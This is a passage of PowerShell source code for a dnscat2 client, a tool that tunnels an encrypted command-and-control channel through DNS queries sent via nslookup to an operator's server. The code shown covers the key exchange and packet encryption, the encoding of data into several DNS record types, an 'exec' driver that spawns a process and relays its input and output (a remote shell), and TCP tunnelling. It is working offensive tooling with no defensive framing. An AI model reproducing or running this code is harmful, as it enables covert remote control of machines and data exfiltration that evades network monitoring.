[Org.BouncyCastle.Crypto.Agreement.ECDHBasicAgreement] $agreement = New-Object Org.BouncyCastle.Crypto.Agreement.ECDHBasicAgreement | |
[Org.BouncyCastle.Asn1.X9.X9ECParameters] $curve = $null | |
[Org.BouncyCastle.Crypto.Parameters.ECDomainParameters] $ecParam = $null | |
[Org.BouncyCastle.Crypto.Parameters.ECPrivateKeyParameters] $privKey = $null | |
[Org.BouncyCastle.Crypto.Parameters.ECPublicKeyParameters] $pubKey = $null | |
[Org.BouncyCastle.Math.EC.ECPoint] $point = $null | |
$curve = [Org.BouncyCastle.Asn1.Nist.NistNamedCurves]::GetByName("P-256") | |
$ecParam = New-Object Org.BouncyCastle.Crypto.Parameters.ECDomainParameters($curve.Curve, $curve.G, $curve.N, $curve.H, $curve.GetSeed()) | |
$privKey = New-Object Org.BouncyCastle.Crypto.Parameters.ECPrivateKeyParameters($client_private_key_bigint, $ecParam) | |
$point = $ecParam.Curve.CreatePoint($server_public_key_x_bigint, $server_public_key_y_bigint, $False ) | |
$pubKey = New-Object Org.BouncyCastle.Crypto.Parameters.ECPublicKeyParameters($point, $ecParam) | |
$agreement.Init($privKey); | |
[Org.BouncyCastle.Math.BigInteger]$secret = $agreement.CalculateAgreement( $pubKey ) | |
return $secret.ToByteArrayUnsigned() | |
} | |
function Get-Dnscat2StreamKeys ($EncryptionKeys) { | |
$EncryptionKeys["client_write"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_write_key"))) | |
$EncryptionKeys["client_mac"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_mac_key"))) | |
$EncryptionKeys["server_write"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_write_key"))) | |
$EncryptionKeys["server_mac"] = Get-SHA3 ($EncryptionKeys["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_mac_key"))) | |
return $EncryptionKeys | |
} | |
function Get-Dnscat2PacketSignature ($mac_key, $PacketHeader, $IV, $EncryptedPacketBody) { | |
return [byte[]]((Get-SHA3 ($mac_key + $PacketHeader + $IV + $EncryptedPacketBody))[0..5]) | |
} | |
function Get-Dnscat2PeerAuthStrings ($EncryptionKeys) { | |
$EncryptionKeys["client_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("client")) + $EncryptionKeys["pubkey_client"] + $EncryptionKeys["pubkey_server"] + $EncryptionKeys["PreSharedSecret"]) | |
$EncryptionKeys["server_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("server")) + $EncryptionKeys["pubkey_client"] + $EncryptionKeys["pubkey_server"] + $EncryptionKeys["PreSharedSecret"]) | |
return $EncryptionKeys | |
} | |
function Get-Dnscat2ShortAuthString ($SharedSecret, $ClientPublicKey, $ServerPublicKey) { | |
$Wordlist = @('Abate','Absorb','Ache','Acidy','Across','After','Alike','Amount','Amuse','Annoy','Annuls','Ardent','Ascot','Bait','Barons','Barret','Bask','Becurl','Befool','Bell','Bifold','Bogie','Boxen','Bozo','Broke','Bulby','Bunny','Calmly','Canary','Cargo','Chirp','Chroma','Cleft','Coke','Column','Comely','Cometh','Convoy','Corn','Cough','Cruxes','Cued','Darter','Dash','Dating','Deadly','Deaf','Decade','Deepen','Depict','Domed','Dorper','Drafts','Dried','Duff','Durian','Early','Easily','Eggars','Emboss','Emit','Encode','Ennui','Envied','Essay','Evites','Evoke','Exotic','Facile','Fate','Feisty','Fewest','Fifty','Filth','Finer','Fished','Flacks','Flaunt','Fleecy','Flied','Foams','Foxes','Freely','Frozen','Genome','Gibbon','Gifts','Giving','Gold','Gone','Gouge','Grocer','Grows','Half','Handle','Harold','Harp','Hedges','Hither','Hobbit','Hobble','Hoods','Hooked','Horror','Horsed','Hound','Huns','Ices','Impish','Jiber','Jiggy','Kelpy','Keyman','Khan','Killer','Klutzy','Lair','Lashes','Libate','Liming','Lonely','Looks','Lordy','Lush','Mailer','Maps','Mayo','Mcgill','Mona','Motive','Mousy','Neigh','Ninjas','Nodule','Nuns','Obese','Olive','Omelet','Omen','Otto','Outran','Ouzo','Owls','Papism','Parrot','Peace','Pearly','Peaty','Pedal','Pegged','Petals','Phials','Pianos','Pierce','Pigs','Pikey','Pitch','Plato','Plays','Plight','Poetic','Poker','Polite','Pontic','Pony','Powers','Poxes','Prams','Pulped','Purr','Push','Quint','Random','Rapier','Ravel','Real','Rebolt','Recoil','Redear','Reink','Ripe','Riprap','Roger','Ropers','Roving','Rumor','Sanded','Sawlog','Sawman','Scribe','Scruff','Seitan','Sense','Shirks','Sippy','Sitcom','Slumpy','Softy','Sonar','Sonny','Sophic','Spear','Spiced','Spikey','Spine','Spoofy','Spring','Static','Staved','Stilt','Stinty','Stirs','Storer','Story','Strode','Stump','Suited','Surfs','Swatch','Swum','Tables','Taking','Tattoo','Teal','Teeth','Telco','Timer','Tins','Tonite','Tore','Tort','Tried','Trivia','Tubule','Tusked','Twins','Twos','Unborn','Undam','Unwrap','Upcurl','Upseal','Visas','Volume','Waded','Wages','Ware','Wears','Wicked','Winful','Wisely','Wisp','Yerba','Zester','Zoner','Zootic') | |
return (Get-SHA3 ([System.Text.Encoding]::ASCII.GetBytes("authstring") + $SharedSecret + $ClientPublicKey + $ServerPublicKey))[0..5] | % { $Wordlist[$_] } | |
} | |
function New-RandomDNSField ($Length) { | |
return [string]((1..$Length | % { 0,1,2,3,4,5,6,7,8,9,'A','B','C','D','E','F' | Get-Random }) -join "") | |
} | |
function Update-Dnscat2ACK ($Data, $AcknowledgementNumber) { | |
return ([string]("{0:x}" -f (([int]("0x" + $AcknowledgementNumber) + $Data.Length/2) % 65535))).PadLeft(4,"0") | |
} | |
function Compare-SequenceNumber ($SequenceNumber, $AcknowledgementNumber) { | |
$SequenceNumber = [uint16]("0x" + $SequenceNumber) | |
$AcknowledgementNumber = [uint16]("0x" + $AcknowledgementNumber) | |
if ($AcknowledgementNumber -lt $SequenceNumber) { # ACK recently rolled over | |
return ($AcknowledgementNumber + 65535 - $SequenceNumber) | |
} else { | |
return ($AcknowledgementNumber - $SequenceNumber) | |
} | |
} | |
function Get-NextDnscat2Data ($DataQueue, $MaxMSGDataSize) { | |
if ($DataQueue.Length -eq 0) { | |
return "" | |
} | |
$Data = "" | |
$PacketCount = 0 | |
if ($MaxMSGDataSize % 2 -eq 1) { | |
$MaxMSGDataSize -= 1 | |
} | |
foreach ($Char in $DataQueue.ToCharArray()) { | |
if ($PacketCount -ge ($MaxMSGDataSize - 12)) { | |
return $Data | |
} | |
$Data += $Char | |
$PacketCount += 1 | |
} | |
if ($Data.Length % 2 -eq 1) { | |
$Data.Substring(0, $Data.Length - 1) | |
} | |
return $Data | |
} | |
function Add-DNSDots ($Data) { | |
$SectionCount = 0 # Tracks the chars in each section between dots | |
$Packet = "" | |
foreach ($Char in $Data.ToCharArray()) { | |
if ($SectionCount -ge 63) { | |
$SectionCount = 0 | |
$Packet += "." | |
} | |
$Packet += $Char | |
$SectionCount += 1 | |
} | |
return $Packet.TrimEnd(".") | |
} | |
function New-Dnscat2SYN ($Domain, $SessionId, $SequenceNumber, $Options) { | |
return ((New-RandomDNSField 4) + "00" + $SessionId + $SequenceNumber + $Options) | |
} | |
function New-Dnscat2MSG ($Domain, $SessionId, $SequenceNumber, $AcknowledgementNumber, $Data) { | |
return ((New-RandomDNSField 4) + "01" + $SessionId + $SequenceNumber + $AcknowledgementNumber + $Data) | |
} | |
function New-Dnscat2FIN ($Domain, $SessionId) { | |
return ((New-RandomDNSField 4) + "02" + $SessionId + "00") | |
} | |
function New-Dnscat2ENC ($Domain, $SessionId, $Subtype, $Flags, $Key) { | |
return ((New-RandomDNSField 4) + "03" + $SessionId + $Subtype + $Flags + $Key) | |
} | |
function ConvertTo-EncryptedDnscat2Packet ($Packet, $EncryptionKeys) { | |
[string]$Packet = $Packet | |
$PaddedNonce = [System.BitConverter]::GetBytes([uint64]$EncryptionKeys["nonce"]) | |
[array]::Reverse($PaddedNonce) | |
$PacketHeader = Convert-HexToBytes $Packet.Substring(0,10) | |
[byte[]]$PacketBody = @() | |
if ($Packet.Length -gt 10) { | |
$PacketBody = Convert-HexToBytes $Packet.Substring(10) | |
} | |
$EncryptedPacketBody = Convert-Salsa20 $PacketBody $EncryptionKeys["client_write"] $PaddedNonce | |
$Signature = Get-Dnscat2PacketSignature $EncryptionKeys["client_mac"] $PacketHeader $PaddedNonce[6..7] $EncryptedPacketBody | |
$EncryptedPacket = $Packet.Substring(0,10) + (Convert-BytesToHex $Signature) + ([Convert]::ToString($EncryptionKeys["nonce"], 16)).PadLeft(4, '0') + (Convert-BytesToHex $EncryptedPacketBody) | |
return $EncryptedPacket | |
} | |
function ConvertFrom-EncryptedDnscat2Packet ($Packet, $EncryptionKeys) { | |
$PacketHeader = ($Packet[0..9] -join "") | |
$Signature = Convert-HexToBytes ($Packet[10..21] -join "") | |
$Nonce = (Convert-HexToBytes ($Packet[22..25] -join "")) | |
$PaddedNonce = (Convert-HexToBytes (($Packet[22..25] -join "").PadLeft(16, '0'))) | |
$EncryptedPacketData = (Convert-HexToBytes ($Packet[26..$Packet.Length] -join "")) | |
$PacketData = Convert-Salsa20 $EncryptedPacketData $EncryptionKeys["server_write"] $PaddedNonce | |
$CorrectSignature = Get-Dnscat2PacketSignature $EncryptionKeys["server_mac"] (Convert-HexToBytes $PacketHeader) $Nonce $EncryptedPacketData | |
if ((Convert-BytesToHex $CorrectSignature) -ne (Convert-BytesToHex $Signature)) { | |
Write-Verbose ("SIGNATURE MISMATCH: Packet " + ($Packet[0..3] -join '')) | |
} | |
return ($PacketHeader + (Convert-BytesToHex $PacketData)) | |
} | |
function Send-Dnscat2Packet ($Packet, $Domain, $DNSServer, $DNSPort, $LookupTypes, $Encryption, $EncryptionKeys) { | |
if ($Encryption) { | |
$Packet = ConvertTo-EncryptedDnscat2Packet $Packet $EncryptionKeys | |
} | |
if ($LookupTypes.Count -gt 0) { | |
$LookupType = $LookupTypes | Get-Random | |
} else { | |
$LookupType = $LookupTypes[0] | |
} | |
$Packet = Add-DNSDots $Packet | |
$Packet += ("." + $Domain) | |
$Command = ("set type=$LookupType`nserver $DNSServer`nset port=$DNSPort`nset retry=1`n" + $Packet + "`nexit") | |
$result = ($Command | nslookup 2>&1 | Out-String) | |
$Done = $False | |
if ($LookupType -eq "TXT") { | |
if ($result.Contains('"')) { | |
$Done = $True | |
$result = ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value) | |
} | |
} elseif ($LookupType -eq "MX") { | |
if ($result.Contains('mail')) { | |
$Done = $True | |
$result = ([string](($result[($result.IndexOf("mail exchanger = ") + 17)..$result.Length] -join '').split("`n")[0])).replace($Domain,"").replace(".","").replace("`n","").replace(" ","").Trim() | |
} | |
} elseif ($LookupType -eq "CNAME") { | |
if ($result.Contains('canonical')) { | |
$Done = $True | |
$result = ([string](($result[($result.IndexOf("canonical name =") + 17)..$result.Length] -join '').split("`n")[0])).replace($Domain,"").replace(".","").replace("`n","").replace(" ","").Trim() | |
} | |
} elseif ($LookupType -eq "A") { | |
if ($result.Contains('Name')) { | |
$Done = $True | |
[byte[]]$Data = @() | |
# Extract and sort the IPs | |
$regex = [regex] "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" | |
$IPs = ($regex.Matches($result.Substring($result.IndexOf("Name"))) | %{ $_.value }) | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split('.'))} | |
# First response is different, it has a length field | |
$PacketLength = [Convert]::ToUInt16($IPs[0].split(".")[1]) | |
$IPs[0].split(".")[2..3] | % { $Data += [Convert]::ToUInt16($_) } | |
$IPs = $IPs[1..$IPs.Count] | |
# Strip the sequence numbers out of the other packets | |
if ($IPs.Count -gt 0) { | |
foreach ($IP in $IPs) { | |
$IP.split(".")[1..3] | % { $Data += [Convert]::ToUInt16($_) } | |
} | |
} | |
# Return result as hex and strip out the padding | |
$result = Convert-BytesToHex $Data[0..($PacketLength - 1)] | |
} | |
} elseif ($LookupType -eq "AAAA") { | |
if ($result.Contains('Name')) { | |
$Done = $True | |
$Data = "" | |
# Extract the IPs | |
$regex = [regex] "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))" | |
$IPs = @() | |
$IPs += ($regex.Matches($result.Substring($result.IndexOf("Name"))) | % { if ($_.value -ne "::") {$_.value} } ) | |
# Expand the IPv6 address | |
for ($i = 0; $i -lt $IPs.Count; $i++) { | |
[byte[]]$ipbytes = ([Net.IPAddress]$IPs[$i]).GetAddressBytes(); | |
$bldr = New-Object System.Text.StringBuilder | |
for ($b =0; $b -lt 16; $b += 2) { | |
$bldr.AppendFormat("{0:x2}{1:x2}:", $ipbytes[$b], $ipbytes[$b+1]) | Out-Null | |
} | |
$bldr.Length = $bldr.Length-1 | |
$IPs[$i] = $bldr.ToString() | |
} | |
# Sort | |
$IPs = $IPs | sort | |
# First response is different, it has a length field | |
$PacketLength = [Convert]::ToUInt16($IPs[0].Substring(2,2),16) | |
$Data += $IPs[0].replace(":","").Substring(4) # Strip length and seq from start | |
# Grab data from responses after the first | |
$IPs = $IPs[1..$IPs.Count] | |
if ($IPs.Count -gt 0) { | |
foreach ($IP in $IPs) { | |
$Data += $IP.replace(":","").Substring(2) # Strip seq from start | |
} | |
} | |
# Return result as hex and strip out the padding | |
$result = $Data.Substring(0, $PacketLength*2) | |
} | |
} | |
if ($Done) { | |
if ($Encryption) { | |
$DecryptedPacket = [string](ConvertFrom-EncryptedDnscat2Packet $result $EncryptionKeys) | |
return $DecryptedPacket | |
} | |
return $result | |
} | |
return 1 | |
} | |
function ConvertTo-Dnscat2Packet ($RawPacket) { | |
if ((($RawPacket.Length)%2 -eq 1) -or ($RawPacket.Length -eq 0)) { | |
return 1 | |
} | |
$Packet = New-Object System.Collections.Hashtable | |
$Packet["PacketId"] = ($RawPacket[0..3] -join "") | |
$Packet["MessageType"] = ($RawPacket[4..5] -join "") | |
$Packet["SessionId"] = ($RawPacket[6..9] -join "") | |
$Packet["Data"] = "" | |
switch ($Packet["MessageType"]) { | |
"00" { | |
$Packet["SequenceNumber"] = ($RawPacket[10..13] -join "") | |
$Packet["AcknowledgementNumber"] = ($RawPacket[10..13] -join "") | |
$Packet["Options"] = ($RawPacket[14..17] -join "") | |
if ($Packet["Options"] -eq 1) { | |
# Name | |
$Packet["Name"] = ($RawPacket[18..$RawPacket.Length] -join "") | |
} elseif ($Packet["Options"] -eq 32) { | |
# Command | |
} | |
} | |
"01" { | |
$Packet["SequenceNumber"] = ($RawPacket[10..13] -join "") | |
$Packet["AcknowledgementNumber"] = ($RawPacket[14..17] -join "") | |
if ($RawPacket.Length -gt 18) { | |
$Packet["Data"] = ($RawPacket[18..$RawPacket.Length] -join "") | |
} else { | |
$Packet["Data"] = "" | |
} | |
} | |
"02" { | |
$Packet["Reason"] = ($RawPacket[10..$RawPacket.Length] -join "") | |
} | |
"03" { | |
$Packet["Subtype"] = ($RawPacket[10..13] -join "") | |
$Packet["Flags"] = ($RawPacket[14..17] -join "") | |
$Keys = ($RawPacket[18..$RawPacket.Length] -join "") | |
if ($Subtype -eq "0000") { # ENC_SUBTYPE_INIT | |
$Packet["server_pubkey_x"] += [Convert]::ToString($Keys[0..63] -join "") | |
$Packet["server_pubkey_y"] += [Convert]::ToString($Keys[64..$Keys.Length] -join "") | |
Write-Verbose ("server_pubkey_x: " + $Packet["server_pubkey_x"]) | |
Write-Verbose ("server_pubkey_y: " + $Packet["server_pubkey_y"]) | |
} else { # ENC_SUBTYPE_INIT | |
$Packet["authenticator"] = $Keys | |
} | |
} | |
} | |
return $Packet | |
} | |
function Start-Dnscat2EncInit ($Session, $Renegotiate) { | |
if ($Renegotiate) { | |
$OldEncryptionKeys = $Session["EncryptionKeys"] | |
} | |
$ECKeyPairGenerator = New-Object Org.BouncyCastle.Crypto.Generators.ECKeyPairGenerator | |
$ECKeyPairGenerator.Init((New-Object Org.BouncyCastle.Crypto.KeyGenerationParameters((New-Object Org.BouncyCastle.Security.SecureRandom), 256))) | |
$ECKeyPair = $ECKeyPairGenerator.GenerateKeyPair() | |
$Session["EncryptionKeys"]["keypair"] = $ECKeyPair | |
$Session["EncryptionKeys"]["client_privkey"] = (Convert-BytesToHex $ECKeyPair.Private.D.ToByteArrayUnsigned()) | |
$Session["EncryptionKeys"]["client_pubkey"] = (Convert-BytesToHex $ECKeyPair.Public.Q.X.ToBigInteger().ToByteArrayUnsigned()) + (Convert-BytesToHex $ECKeyPair.Public.Q.Y.ToBigInteger().ToByteArrayUnsigned()) | |
$Session["EncryptionKeys"]["client_pubkey_x"] = (Convert-BytesToHex $ECKeyPair.Public.Q.X.ToBigInteger().ToByteArrayUnsigned()) | |
$Session["EncryptionKeys"]["client_pubkey_y"] = (Convert-BytesToHex $ECKeyPair.Public.Q.Y.ToBigInteger().ToByteArrayUnsigned()) | |
$Subtype = "0000" # ENC_SUBTYPE_INIT | |
$Flags = "0000" | |
Write-Verbose ("client_pubkey: " + ($Session["EncryptionKeys"]["client_pubkey"])) | |
$EncPacket = (New-Dnscat2ENC $Session["Domain"] $Session["SessionId"] $Subtype $Flags $Session["EncryptionKeys"]["client_pubkey"] $Session["MaxMSGDataSize"]) | |
try { | |
$Packet = 1 | |
# If we are renegotiating, encrypt the packet | |
$Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $EncPacket $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Renegotiate $OldEncryptionKeys) | |
} catch {} | |
if ($Packet -eq 1) { | |
Write-Error "Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly." | |
return 1 | |
} | |
$Session["EncryptionKeys"]["server_pubkey_x"] = $Packet["server_pubkey_x"] | |
$Session["EncryptionKeys"]["server_pubkey_y"] = $Packet["server_pubkey_y"] | |
$Session["EncryptionKeys"]["server_pubkey"] = ($Session["EncryptionKeys"]["server_pubkey_x"] + $Session["EncryptionKeys"]["server_pubkey_y"]) | |
[uint16]$Session["EncryptionKeys"]["nonce"] = 0 | |
$Session["EncryptionKeys"]["shared_secret"] = Get-SharedSecret $Session["EncryptionKeys"]["client_privkey"] $Session["EncryptionKeys"]["server_pubkey_x"] $Session["EncryptionKeys"]["server_pubkey_y"] | |
$Session["EncryptionKeys"]["client_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("client")) + $Session["EncryptionKeys"]["shared_secret"] + (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) + (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) + ([System.Text.Encoding]::ASCII.GetBytes($Session["EncryptionKeys"]["PreSharedSecret"]))) | |
$Session["EncryptionKeys"]["server_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("server")) + $Session["EncryptionKeys"]["shared_secret"] + (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) + (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) + ([System.Text.Encoding]::ASCII.GetBytes($Session["EncryptionKeys"]["PreSharedSecret"]))) | |
$Session["EncryptionKeys"]["sas"] = Get-Dnscat2ShortAuthString $Session["EncryptionKeys"]["shared_secret"] (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) | |
$Session["EncryptionKeys"]["client_write"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_write_key"))) | |
$Session["EncryptionKeys"]["client_mac"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_mac_key"))) | |
$Session["EncryptionKeys"]["server_write"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_write_key"))) | |
$Session["EncryptionKeys"]["server_mac"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_mac_key"))) | |
$Session["Negotiated"] = $True | |
return $Session | |
} | |
function Start-Dnscat2EncAuth ($Session) { | |
$Subtype = "0001" # ENC_SUBTYPE_AUTH | |
$Flags = "0001" | |
$EncPacket = (New-Dnscat2ENC $Session["Domain"] $Session["SessionId"] $Subtype $Flags (Get-NextDnscat2Data (Convert-BytesToHex $Session["EncryptionKeys"]["client_auth"]) $Session["MaxMSGDataSize"])) | |
try { | |
$Packet = 1 | |
$Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $EncPacket $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $False $null) | |
} catch { } | |
if ($Packet -eq 1) { | |
Write-Error "Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly." | |
return 1 | |
} | |
if ($Packet["authenticator"] -eq (Convert-BytesToHex $Session["EncryptionKeys"]["server_auth"])) { | |
Write-Verbose "SESSION AUTHENTICATED" | |
} else { | |
Write-Error "MITM WARNING: Server responded with an incorrect PreSharedSecret!" | |
return 1 | |
} | |
return $Session | |
} | |
function Start-Dnscat2Session ($SessionId, $Options, $Domain, $DNSServer, $DNSPort, $MaxPacketSize, $Encryption, $PreSharedSecret, $LookupTypes, $Delay, $MaxRandomDelay, $Driver, $DriverOptions) { | |
$Session = New-Object System.Collections.Hashtable | |
$Session["SessionId"] = $SessionId | |
$Session["Domain"] = $Domain | |
$Session["DNSServer"] = $DNSServer | |
$Session["DNSPort"] = $DNSPort | |
$Session["SequenceNumber"] = (New-RandomDNSField 4) | |
$Session["MaxPacketSize"] = $MaxPacketSize | |
$Session["MaxMSGDataSize"] = $MaxPacketSize - $Domain.Length - 18 | |
$Session["Driver"] = $Driver | |
$Session["Dead"] = $False | |
$Session["NewSessions"] = New-Object System.Collections.Hashtable | |
$Session["Delay"] = $Delay | |
$Session["MaxRandomDelay"] = $MaxRandomDelay | |
$Session["LookupTypes"] = $LookupTypes | |
$Session["SYNOptions"] = $Options | |
$Session["PSCommandReady"] = $False | |
$Session["PSCommand"] = "" | |
$Session["PSUploadReady"] = $False | |
$Session["PSUploadName"] = "" | |
$Session["PSUploadValue"] = $null | |
$Session["PSDownloadReady"] = $False | |
$Session["PSDownloadPacketIdBF"] = "" | |
$Session["PSDownloadName"] = "" | |
$Session["Encryption"] = $Encryption | |
$Session["Negotiated"] = $False | |
$Session["EncryptionKeys"] = New-Object System.Collections.Hashtable | |
$Session["EncryptionKeys"]["PreSharedSecret"] = $PreSharedSecret | |
if ($Encryption) { | |
$Session = Start-Dnscat2EncInit $Session $False | |
if ($Session -eq 1) { | |
return 1 | |
} | |
if ($PreSharedSecret -ne "") { | |
$Session = Start-Dnscat2EncAuth $Session | |
if ($Session -eq 1) { | |
return 1 | |
} | |
} | |
} | |
$SYNPacket = (New-Dnscat2SYN $Domain $SessionId $Session["SequenceNumber"] $Options) | |
$Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $SYNPacket $Domain $DNSServer $DNSPort $LookupTypes $Session["Encryption"] $Session["EncryptionKeys"]) | |
if ($Packet -eq 1) { | |
Write-Error "Failed to start session. Ensure your dnscat2 server is set up correctly." | |
return 1 | |
} | |
$Session["DriverDataQueue"] = $Packet["Data"] | |
$Session["AcknowledgementNumber"] = $Packet["AcknowledgementNumber"] | |
if($Driver -eq "console") { | |
} elseif ($Driver -eq "command") { | |
$Session["RemainingBytes"] = 0 | |
$Session["PacketId"] = "" | |
$Session["PacketIdBF"] = "" | |
$Session["IsResponse"] = "" | |
$Session["CommandId"] = "" | |
$Session["CommandFields"] = "" | |
$Session["CommandFieldsBytes"] = @() | |
$Session["CommandPacketBuffer"] = "" | |
$Session["Tunnels"] = New-Object System.Collections.Hashtable | |
$Session["DeadTunnels"] = @() | |
} elseif ($Driver -eq "exec") { | |
$ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo | |
$ProcessStartInfo.FileName = $DriverOptions | |
$ProcessStartInfo.UseShellExecute = $False | |
$ProcessStartInfo.RedirectStandardInput = $True | |
$ProcessStartInfo.RedirectStandardOutput = $True | |
$ProcessStartInfo.RedirectStandardError = $True | |
$Process = [System.Diagnostics.Process]::Start($ProcessStartInfo) | |
$Process.Start() | Out-Null | |
$StdOutDestinationBuffer = New-Object System.Byte[] 65536 | |
$StdOutReadOperation = $Process.StandardOutput.BaseStream.BeginRead($StdOutDestinationBuffer, 0, 65536, $null, $null) | |
$StdErrDestinationBuffer = New-Object System.Byte[] 65536 | |
$StdErrReadOperation = $Process.StandardError.BaseStream.BeginRead($StdErrDestinationBuffer, 0, 65536, $null, $null) | |
$Session["Process"] = $Process | |
$Session["ProcessId"] = $Process.Id | |
$Session["StdOutReadOperation"] = $StdOutReadOperation | |
$Session["StdOutDestinationBuffer"] = $StdOutDestinationBuffer | |
$Session["StdErrReadOperation"] = $StdErrReadOperation | |
$Session["StdErrDestinationBuffer"] = $StdErrDestinationBuffer | |
} | |
if ($Session["MaxMSGDataSize"] -le 0) { | |
Write-Error "Domain name is too long." | |
return 1 | |
} | |
return $Session | |
} | |
function New-Dnscat2Tunnel ($Session, $TunnelId) { | |
$Socket = New-Object System.Net.Sockets.TcpClient | |
$Handle = $Socket.BeginConnect($Session["Tunnels"][$TunnelId].Host,$Session["Tunnels"][$TunnelId].Port,$null,$null) | |
$Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() | |
while ($True) { | |
if($Handle.IsCompleted) { | |
try { | |
$Socket.EndConnect($Handle) | |
$Stream = $Socket.GetStream() | |
$BufferSize = $Socket.ReceiveBufferSize | |
break | |
} catch { | |
$Socket.Close() | |
$Stopwatch.Stop() | |
$Session["Tunnels"][$TunnelId].Add("Dead", $True) | |
return $Session | |
} | |
} | |
if($Stopwatch.Elapsed.TotalSeconds -gt 10) { | |
$Socket.Close() | |
$Stopwatch.Stop() | |
$Session["Tunnels"][$TunnelId].Add("Dead", $True) | |
return $Session | |
} | |
Sleep -Milliseconds 100 | |
} | |
$Session["Tunnels"][$TunnelId].Add("Stream", $Stream) | |
$Session["Tunnels"][$TunnelId].Add("Socket", $Socket) | |
$Session["Tunnels"][$TunnelId].Add("BufferSize", $BufferSize) | |
$Session["Tunnels"][$TunnelId].Add("StreamDestinationBuffer", (New-Object System.Byte[] $Session["Tunnels"][$TunnelId]["BufferSize"])) | |
$Session["Tunnels"][$TunnelId].Add("StreamReadOperation", $Session["Tunnels"][$TunnelId]["Stream"].BeginRead($Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"], 0, $Session["Tunnels"][$TunnelId]["BufferSize"], $null, $null)) | |
$Session["Tunnels"][$TunnelId].Add("StreamBytesRead", 1) | |
$Session["Tunnels"][$TunnelId].Add("Dead", $False) | |
return $Session | |
} | |
function Read-FromDnscat2Tunnel ($Session, $TunnelId) { | |
if ($Session["Tunnels"][$TunnelId]["StreamBytesRead"] -eq 0) { | |
$Session["Tunnels"][$TunnelId].Dead = $True; return $Session | |
} | |
if ($Session["Tunnels"][$TunnelId]["StreamReadOperation"].IsCompleted) { | |
$Session["Tunnels"][$TunnelId]["StreamBytesRead"] = $Session["Tunnels"][$TunnelId]["Stream"].EndRead($Session["Tunnels"][$TunnelId]["StreamReadOperation"]) | |
if($Session["Tunnels"][$TunnelId]["StreamBytesRead"] -eq 0){ $Session["Tunnels"][$TunnelId].Dead = $True; return $Session } | |
$Data = $Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"][0..([int]($Session["Tunnels"][$TunnelId]["StreamBytesRead"])-1)] | |
$Session["Tunnels"][$TunnelId]["StreamReadOperation"] = $Session["Tunnels"][$TunnelId]["Stream"].BeginRead($Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"], 0, $Session["Tunnels"][$TunnelId]["BufferSize"], $null, $null) | |
# Queue tunnel packets | |
$Data = Convert-BytesToHex $Data | |
$PacketId = (New-RandomDNSField 4) | |
$PacketId = ([Convert]::ToString(([convert]::ToUInt16($PacketId, 16) -band ( -bnot [uint16]([Math]::Floor(1 * [Math]::Pow(2,15))))),16)).PadLeft(4, '0') | |
$PacketLengthField = ([Convert]::ToString(($PacketId.Length/2 + 2 + $TunnelId.Length/2 + $Data.Length/2),16)).PadLeft(8, '0') | |
$DriverData = ($PacketLengthField + $PacketId + "1001" + $TunnelId + $Data) | |
